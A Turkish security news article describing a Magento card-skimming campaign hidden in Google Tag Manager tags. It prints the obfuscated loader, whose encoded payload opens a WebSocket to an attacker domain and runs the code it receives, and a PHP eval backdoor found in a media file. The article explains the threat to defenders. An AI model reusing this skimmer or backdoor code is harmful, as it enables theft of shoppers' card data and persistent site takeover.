Bilgisayar korsanları, e -ticaret sitelerinden, özellikle Magento platformunda inşa edilenlerden hassas kredi kartı bilgilerini çalmak için Google Tag Manager’dan (GTM) sömürüyor.
Bu sofistike saldırı, kötü niyetli amaçlar için meşru araçlardan yararlanmada siber suçluların gelişen taktiklerini göstermektedir.
Google Tag Manager, Google tarafından sağlanan web sitesi sahiplerinin, sitenin kodunu doğrudan değiştirmeye gerek kalmadan pazarlama etiketlerini yönetmesine ve dağıtmasına olanak tanıyan ücretsiz bir araçtır.
Sucuri’deki araştırmacılar, Google Analytics, AdWords ve Facebook Pixel gibi araçlar için etiket ekleme ve güncelleme sürecini basitleştirdiğini ve pazarlamacıların web sitesi etkinliğini izlemesini ve kampanyaları optimize etmesini kolaylaştırdığını belirtti.
Kötü amaçlı yazılım saldırısı
Saldırı, ilk bakışta meşru görünecek şekilde tasarlanmış GTM etiketlerine kötü amaçlı kodların yerleştirilmesini içerir.
Bununla birlikte, daha yakından incelendiğinde, bu komut dosyalarının ödeme işlemi sırasında kullanıcılar tarafından girilen hassas verileri topladığı ve saldırganlar tarafından kontrol edilen uzak bir sunucuya gönderdiği bulunmuştur.
Kötü amaçlı kod genellikle standart bir GTM ve Google Analytics izleme komut dosyası olarak görünür, ancak kredi kartı sıyırıcıları görevi gören kodlanmış JavaScript yükleri içerir. Örneğin:-
(function(i, s, h, k, l, o, c, m) {
m['GoogleAnalyticsObjects'] = o;
c = s.createElement(h), i = s.getElementsByTagName(h)[0];
if (l.href.match(new RegExp(atob(o)))) {
c.async = 1;
c.src = new Function(atob(k)).call(this);
}
})('jb', document, 'script', 'd2luZG93Lnd3ID0gbmV3IFdlYlNvY2tldCgoJ3dzczovL2V1cm93ZWJtb25pdG9ydG9vbC5jb20vY29tbW9uP3NvdXJjZT0nKSArIGVuY29kZVVSSUNvbXBvbmVudChsb2NhdGlvbi5ocmVmKSk7d2luZG93Lnd3Lm9ubWVzc2FnZT1mdW5jdGlvbihlKXtldmFsKGUuZGF0YSk7fQ==', window.location, 'Y2hlY2tvdXQ' + '=', '\/\/www.google-analytics.com\/analytics.js', window);Bu kod, gerçek amacını gizlemek için Base64 kodlama ve gizleme tekniklerini kullanır.
GTM kötü amaçlı yazılımlara ek olarak, ./media/index.php dosya. Bu arka kapı, siteye daha fazla enfekte etmek için kullanılabilir ve saldırganlara kalıcı erişim sağlayabilir.
.webp)
Arka kapı kodu:-
function get_data($param, $default) {
$total = $_REQUEST;
if(isset($total[$param])) {
return $total[$param];
} else {
return $default;
}
}
function get_cli() {
if( strpos(hash("sha256", get_data("item", "")), "5a2c75360f3ff123") === false )
return "";
$param_name = "order";
$data = get_data($param_name, "");
$cli = get_cli();
return eval($cli);
}Bu tür saldırılara karşı korumak için, web sitesi yöneticileri tüm etiketlerin meşru ve yetkili personel tarafından yerleştirilmesini sağlamak için GTM etiketlerini düzenli olarak izlemelidir.
Şüpheli komut dosyalarını ve arka kapıları kontrol etmek, web sitesi güvenlik duvarları ve kötü amaçlı yazılım algılama sistemleri gibi güvenlik araçlarını kullanmalı ve tüm eklentilerin ve platformların güncel olmasını sağlayarak tüm yazılımları güncel tutmalıdırlar.
Are you from SOC/DFIR Team? - Join 500,000+ Researchers to Analyze Cyber Threats with ANY.RUN Sandbox - Try for Free